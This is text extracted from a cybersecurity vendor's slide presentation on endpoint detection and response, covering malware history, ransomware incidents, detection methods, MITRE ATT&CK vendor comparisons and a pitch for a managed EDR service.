Demystifying

Endpoint Detection
and Response
A deep dive into Endpoint Protection
Systems and their key capabilities

Paul Jack – 02-12-21

Paul Jack
• Cyber security lead engineer
Paul Jack

•
Cyber Security Lead Engineer
17 year’s experience with Sec-1
(Claranet Cyber Security)

• Background - Implementing
cyber security solutions

• Mainly covering…
SIEM / EDR / Firewall / BAS / MFA
Agenda

• The evolution of malware

• High profile security breaches
• Endpoint technology definitions
• Malware detection: Capabilities
• Evaluating EDR solutions
• Live ransomware demo
• Our chosen EDR partner & EDR services
Endpoint Detection and Response

Key Security
Threats
Threat Evolution - Key dates
1986 1987 1989 2021
FIRST COMPUTER AV SOFTWARE BIRTH OF
VIRUS WRITTEN FOR AVAILABLE RANSOMWARE
AN IBM PC (AIDS TROJAN) • Ransomware as a service
• subscription services available
(Dark Web)
• Affiliate programs
2000 2001 2003 • Creator's gain % of paid ransoms
LOVE LETTER VIRUS (POC CODE RED SQL SLAMMER
as commission
FOR SOCIAL ENGINEERING) 1ST FILELESS MALWARE FILELESS MALWARE
PAYLOAD DELIVERY
• Open RaaS
• Closed RaaS
• Lone Wolves
•
2008 2013 2016 •
Ransomware + Data leak bundled
Largest Ransom ever paid by CNA
BITCOIN INTRODUCED CRYPTOLOCKER LOCKY
Financial $40m
(GAME CHANGER) RANSOMWARE TERM BECOMES (RANSOMWARE)
A HOUSEHOLD NAME (HEALTHCARE US) • Supply chain attacks

2017 2017
WANNACRY HUGE DATA BREACH
HEALTHCARE UK (FILELESS MALWARE)
(RANSOMWARE)
Supply Chain attacks

Supply Chain
SolarWinds Orion attack highlights Backdoor Access
Attacker
the difficulty of defending against
supply chain attacks.

First reported in December 2020 Third-Party

Vendor

Target Data Flow

organisation

Hafnium
Feb 2021
Threat Evolution - Fileless Malware
General Fileless
malware example

• 149 Million records from America’s

• 15.2 Million records from British Citizens
• 19000 Canadian records
• One of the largest personal record thefts
• Attack method used : File Less Malware
• Result : Data Exfiltration
• Vulnerable System: Apache Server
(Apache struts Vuln – used to remotely execute commands)
CVE-2017-5638
Ransomware (last 12 months)
• Scottish Environment SEPA (24/12/2020)

Cyber Security response playbooks were encrypted

CEO – Advised recovery of IT systems could take 24 months
Punishment – Commercial data published to Dark web
(Including details of private staff grievances)

• Colonial pipeline company (07/05/2021)

US East coast
Billing system was compromised
Led to the panic buying of fuel.
Fuel Shortage + Planes had to divert to refuel
Typical recovery scenarios
Prevent further propagation
• Isolate the device / Disconnect

Recovery Process
• Pay the ransom
• Reinstall the device
• Restore using 3rd Party system
(outside of EPP)
• KB article – manual clean up
• Ransomware decryption tools
(Not guaranteed, No ETA)

Investigation
• Root cause analysis / Data
Threat landscape stats
Ransomware Stats General breach stats
• In 2021 the average ransom demand was $5.3m • 4 in every 10 businesses have reported a cyber
up 518% breach in the last 12 months (40%)

• The average ransom paid by victims was
$570,000 up 82%
• The average amount of downtime a company
experiences after a ransomware attack is 21 days
• In medium sized businesses this is 65%
• In Large businesses this is 64%
• Attacks leveraging PowerShell grew by 208%

• Ransomware attacks increased by 151% so far in • Attacks leveraging MS office grew by 199%
2021 with even higher levels expected in 2022
(Due to RaaS providing a lower barrier to entry)
Endpoint Detection and Response

Endpoint
technology
definitions
Endpoint technology definitions (& Next Gen)

EPP – End Point Protection Active EDR

• Closest to traditional Legacy AV Joined up and contextual meta data
• Relied on signatures, sandboxing & lookup leading to intelligent decision making
technology detect it kill it.
• Lack of telemetry / No investigation possible Active EDR Advanced
Joined up contextual meta data
EDR (Wave 1) available to Analysts via threat hunting
Flight box recorder / collects telemetry meta data
We give you the info you decide if event is bad XDR – Extended Detection & Response
Too much data to analyse – Analyst fatigue As Above providing coverage of both Endpoints
and Network devices (MDR + EDR)
EDR (Wave 2)
• Convergence of EPP and EDR
• Increased efficacy / upgraded detection engines
• Auto remediates threats it detects
• Provides all the meta data (unstructured)
Endpoint Detection and Response

Active EDR
Real world example
Active EDR – Theory in the real world
Active EDR – Theory in the real world

Event 1
PERSON 1 - Parks a car outside the Hatton Garden safety deposit building and sits there for an hour
Event 2
PERSON 2 - Arrives by bus, walks around the perimeter of the building and takes some photos
Event 3
PERSON 3 – “An alarms expert” downloads the specs & design documents for the buildings alarm system
Event 4
They all meet up together for a pint in a local pub
Active EDR – Theory in the real world
Active EDR – Theory in the cyber world
Event 1
Open a spread sheet containing a macro
Event 2
Enable Macros to update a currency exchange rate
Event 3
Macro launches PowerShell
Event 4
PowerShell downloads and executes a payload to memory

Context is key!
Endpoint Detection and Response

Product selection
& evaluation
Selecting an Endpoint Solution

Meeting an auditors minimum requirements

Detection methods – Engines (Legacy)
Detection
Prevention technique
Engine/Method
• Signatures • Match a file hash / identifier
• Application Whitelisting • Allows execution of pre approved
applications
• Sandboxing • Execute in virtual environment
• Speeds up time
• Third-party Threat Intel / • Match pre analysed and
Cloud lookups documented malware
• Data from a wider array of
vendors/ security researchers
( e.g Virus Total)
• Heuristics • Checks for abnormalities within a
file based on best practices
- i.e Digitally signed by vendor
Mitigation coverage
• Known Malware
(Strain must have been identified
previously)
• Prevents execution of untrusted
apps
• Evasive, Stealthy APT’S
• Polymorphic malware (behavioural)
• Known Malware
• Unsophisticated Zero day malware
if the lookup includes heuristics
checks (Anomalies)
• Detect malware containing obvious
abnormalities in its file structure
Method Weakness
• Unknown or Zero Day Malware
• Polymorphism / ATP’s / Fileless Malware
• Requires constant updates
• Whitelisted apps can be exploited and used
for malicious activities
• Mitigation delays (not practical for live web access
works well with email systems)
• Delays in taking appropriate actions
• Must have been analysed previously
• Requires an internet connection to lookup
• Prone to false positives
• Requires the support of other detection engines
Detection / AI-ML Models (Next-Gen)

Malicious Files Building up a model

Extract Features Train Model Model

Benign Files Running the model

Malicious

Extract Features Model

Benign
Detection / Static AI (Next-Gen)
Decision Tree (Random Forrest ML Model)

True Has 4 legs False

Has sharp claws Has wings

True False

Lower than 100m

Increased balance
olfactory receptors True

True False False

True

Dog 1% Dog 70% Dog 1% Dog 90% Dog 0%

Cat 99% Cat 30% Cat 99% Cat 10% Cat 0%
Detection / Behavioural AI (Next-Gen)
Decision Tree (Random Forrest ML Model)

True Loves you False

Finds objects through

Bites you
sense of smell False

True False

True
Attacks without warning Enjoys Walks with you Falls asleep in odd places

True False True False True False

Dog 2% Dog 70% Dog 99% Dog 40% Dog 3% Dog 8% Dog 46%
Cat 98% Cat 30% Cat 1% Cat 60% Cat 97% Cat 92% Cat 54%
Static AI / Behavioural AI (Next-Gen)
Detection Engine/Method
• Static AI
• Behavioural AI
Key Advantages Key Disadvantages
• Outcome is determined pre-execution • Doesn’t reliably determine behaviour
• Doesn’t detect what happens in memory
• Less likely to detect novel and Zero day threats
• Easier for an attacker to develop counter-measures
(Easier to change file structure than a files behaviour)
• Provides coverage of more dynamic attacks including • Enabled post execution
• Living off the Land Attacks
• Fileless Malware • No Human Intelligence applied to it’s decision making
• Ransomware
• Zero Day Malware and ATP’s
• Lateral movement / scripts, local CLI, and active content
memory exploitation /privilege escalation / errant system
manipulation / registry operations / kernel operations /
stealth, spying / anti-detection / network activity,
persistence, anti-debugging, data collection, file operations
and manipulations
• Process operations
Detection Methods / Visibility (Next-Gen)
Detection Method Visibility technique Coverage

• Visibility methods • On Disk Write (What is it?) • Only analyses files written to disk
(Can’t see memory based script and file execution)

• Process injection (What is it?)

• Provides the ability to see all process activity even those
executed in memory as well as file’s written to disk
(Provides visibility of fileless attacks)

• Linked process meta data can be extracted for analysis

• Active EDR Advanced Providing an interface for analysts to pivot around telemetry • Supports analyst driven intelligence to discover threats
(Threat hunting capabilities) data from a device to conduct in depth investigations legacy detection engines & AI models cant, including living
off the land attacks

• Contextual and linked meta data provided via GUI for

incident response and root cause analysis investigations
Other considerations

Consideration Question to ask

• Implementation and configuration changes • Will the product require lots of config changes to perform to its full capability?

• Agent Autonomy • Does the product have the ability to perform as well and at machine speed when offline?

• Remediation and recovery options
• System Support
• Can the endpoint solution isolate an infected device from the network to prevent spread?
• Does the product provide full remediation of an attack storyline (Everything the attacker touched – Undone)
• What about a successful ransomware attack - Can the Endpoint solution perform a full recovery for you quickly
and with no input from 3rd party systems
• Do you need a separate solution to cover other systems in your estate?
- Remote workers
- Servers
- Cloud environments
- Dev environments (Docker Kubernetes, Amazon EKS etc)
Gartner Magic Quadrant Leader
MITRE ATT&CK

https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
MITRE ATT&CK

https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
Endpoint Detection and Response

Our chosen
EDR vendor
Our chosen vendor
Visibility (Mitre ATT&CK results)

Vendors of note Visibility score

Sentinel One 100%

CrowdStrike 87%
Microsoft 87%
Sophos 68%
Delayed Detections (Mitre ATT&CK results)

Delayed
Vendors of note
Detections
Sentinel One 0
Sophos 0
Microsoft 1
CrowdStrike 15
Configuration changes (Mitre ATT&CK results)

Vendors Visibility score

Sentinel One 0
Sophos 6
CrowdStrike 25
Microsoft 35
Analytic Detection Coverage (Mitre ATT&CK results)

Analytic Detection
Vendors of note
Coverage
Sentinel One 159/174
Microsoft 134/174
CrowdStrike 64/174
Sophos 39/174
Storyline Tracking
Detection Engines (Mitre ATT&CK results)

• Reputation Engine
• Static AI “Malicious”
• Static AI “Suspicious”
• Static AI - Executables
• Static AI - Potentially Unwanted Apps
• Behavioural AI – Executables
• Behavioural AI - Documents, Scripts
• Behavioural AI - Lateral Movement
• Behavioural AI - Anti-Exploitation / File-less
• Application control (Containerised workloads)
• Detect Interactive Threats (Insider Threats)
SentinelOne technology overview
MITRE ATT&CK & Gartner Leader
 Sentinel One - System architecture

Endpoint software Endpoint software Endpoint software

is installed is installed is installed
Endpoint Detection and Response

Live Ransomware
Demo
Recover encrypted files in minutes!
EDR Management Challenges
Time
• To review all suspicious alerts
(Next-Gen EDR / Meta data)

Skills Budget & Resources

• Required Cyber security skills and
• To finance a suitably sized, skilled and available team
certifications
• To provide 24/7 response actions 365 days a year
• Perform the investigations properly
• Make the correct response decisions &
Recovery actions
• Conduct analyst driven threat hunting
activities
 Managed EDR Overview
All alarms are triaged Continuous tuning Security events are
by a security analyst managed and
activities
reported through
a customer
management portal
Abnormalities are We act!
The endpoint agent
raised as an alarm
KILL
monitors for threats using
behavioural AI and static
QUARANTINE

=
analysis (Next Gen AV)

Security REMEDIATE
Operations Centre
ROLLBACK

Analyst Driven Threat

Hunting activities

Quarterly Service
Reviews

Monthly Security
Reports
Service SLA’s & response model

P1 Critical Response:
Notification within 15 minutes 15 minutes

P2 High Response:
Notification within 30 minutes 30 minutes

P3 Medium Response:
Notification within 2 hours 2 hours

P4 Low
Response:
Notification within 4 hours 4 hours
Claranet Online
 SOC Team - Threat Hunting
• Abnormal behaviour on multiple servers (Exchange, DC’s)
• Current AV didn’t detect anything suspicious
• Sentinel One found multiple malicious files on customer systems

• Further abnormal connections detected

• SOC used Deep Visibility meta data to pinpoint connection source

• legitimate vendor tools had been installed in a temp directory

• Although the tools were legitimate the config file had been modified

• Off the back of the Hafnium vulnerability the attacker

had managed to download the 2 legitimate tools to the temp
directory

• Legitimate program: AI modelling + other engines

were unable to detect that the activity was malicious

• The software’s purpose was to provide RDP access

for use by system admins.
• However the modified config file port forwarded the RDP session
outbound, advertising the connection URL to the attacker.

Deep Visibility
Provided the tools & the detailed meta data for the SOC team
to identify and nullify this threat.
EDR Service offering

• Licensed Software

• Installation & configuration

EDR as a Service • Technical product support
• Claranet Online portal access

• EDR Event Analysis

• EDR Incident Handling
• 24/7 EDR Analysis (Out ofhours)
• Remediation / Rollback
Managed EDR • Policy tuning, exclusions, reduction
of false positives
• Threat Intelligence (Analyst driven)
• Threat Hunting activities
• Monthly Security Report

Managed EDR + MDR Managed XDR

For more information
about Endpoint Detection
and Response
Call us to arrange your free POC:

+44 (0)330 390 0504